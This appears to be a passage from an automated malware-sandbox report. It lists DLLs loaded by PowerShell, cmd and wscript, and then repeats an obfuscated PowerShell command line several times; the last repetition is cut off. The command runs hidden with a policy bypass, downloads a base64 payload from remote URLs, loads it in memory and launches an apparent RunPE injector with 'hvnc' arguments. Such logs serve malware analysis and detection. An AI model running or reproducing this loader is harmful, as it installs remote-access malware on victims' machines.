Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc6.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dnsapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winnsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasadhlp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: fwpuclnt.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: schannel.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mskeyprotect.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ntasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ncrypt.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ncryptsslp.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasapi32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasman.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rtutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mswsock.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winhttp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ondemandconnroutehelper.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iphlpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc6.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dhcpcsvc.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dnsapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: winnsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rasadhlp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: fwpuclnt.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: schannel.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mskeyprotect.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ntasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ncrypt.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ncryptsslp.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: cmdext.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: policymanager.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: msvcp110_win.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: wintypes.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: appresolver.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: bcp47langs.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: slc.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sppc.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecorecommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: onecoreuapcommonproxystub.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: pcacli.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\cmd.exe |
Section loaded: sfc_os.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sxs.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: vbscript.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrobj.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mlang.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: mpr.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: scrrun.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: ntmarta.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: edputil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: windows.staterepositoryps.dll |
|
Source: C:\Windows\System32\wscript.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe 